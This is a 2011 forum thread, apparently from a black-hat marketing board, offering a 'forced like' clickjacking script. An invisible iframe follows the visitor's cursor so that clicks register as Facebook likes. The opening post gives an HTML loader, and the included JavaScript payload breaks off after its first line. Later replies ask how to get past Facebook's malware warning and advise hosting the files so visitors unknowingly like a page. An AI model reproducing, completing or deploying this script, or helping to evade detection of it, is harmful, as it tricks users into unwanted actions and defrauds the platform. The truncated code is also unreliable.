Search (advanced search) | ||||
Use this Search form before posting, asking or make a new thread.
|
04-07-2011, 09:54 PM
Post: #1
|
|||
|
|||
[GET] Basic Forced Like / Clickjacking script [Public Edition]
Script below creates a iframe like box that follows your cursor. The iframe is invisible and requires the user to click somewhere.
Paste these codes into 2 separate files (one html, one js) index.html PHP Code: <script language="javascript"> window.onload = function(){ var s = document.createElement('script'); s.src = 'jscript.js'; document.getElementsByTagName('body')[0].appendChild(s); } </script> <body> Click anywhere </body> jscript.js Code: (function(){ >>> Making impossible things possible!!! <<<
I love BBHF and MVP so much.
-TheDonator-
|
|||
04-15-2011, 12:39 AM
Post: #2
|
|||
|
|||
RE: [FREE] Basic Forced Like / Clickjacking script [Public Edition]
thanks bro! will try this..
|
|||
05-27-2011, 01:09 AM
(This post was last modified: 05-27-2011 01:11 AM by cpachamp1.)
Post: #3
|
|||
|
|||
RE: [GET] Basic Forced Like / Clickjacking script [Public Edition]
Its Working.. But When we share it on our wall.. and click link.. facebook malware popup :@
Is There Any way to Hide Malware? |
|||
07-02-2011, 03:11 AM
Post: #4
|
|||
|
|||
RE: [GET] Basic Forced Like / Clickjacking script [Public Edition]
what a script!!
|
|||
08-04-2011, 08:17 PM
Post: #5
|
|||
|
|||
RE: [GET] Basic Forced Like / Clickjacking script [Public Edition] | |||
08-04-2011, 10:30 PM
Post: #6
|
|||
|
|||
RE: [GET] Basic Forced Like / Clickjacking script [Public Edition]
Anyone find out if there was a way to hide the malwarE?
|
|||
08-05-2011, 08:28 PM
Post: #7
|
|||
|
|||
RE: [GET] Basic Forced Like / Clickjacking script [Public Edition]
I would like to try this out only if somehow could get rid of the malware. Thanks anyway
|
|||
08-05-2011, 08:48 PM
Post: #8
|
|||
|
|||
RE: [GET] Basic Forced Like / Clickjacking script [Public Edition] | |||
08-06-2011, 12:19 AM
Post: #9
|
|||
|
|||
RE: [GET] Basic Forced Like / Clickjacking script [Public Edition]
(08-05-2011 08:48 PM)bigspanner Wrote: Please explain where do we upload these two files to. The porn dot com should be replaced with your facebook fan page url. Better way should be to upload it to your website and let the user click. if facebook is opened it is give you a like. That is what i feel. |
|||
08-15-2011, 04:39 AM
Post: #10
|
|||
|
|||
RE: [GET] Basic Forced Like / Clickjacking script [Public Edition] | |||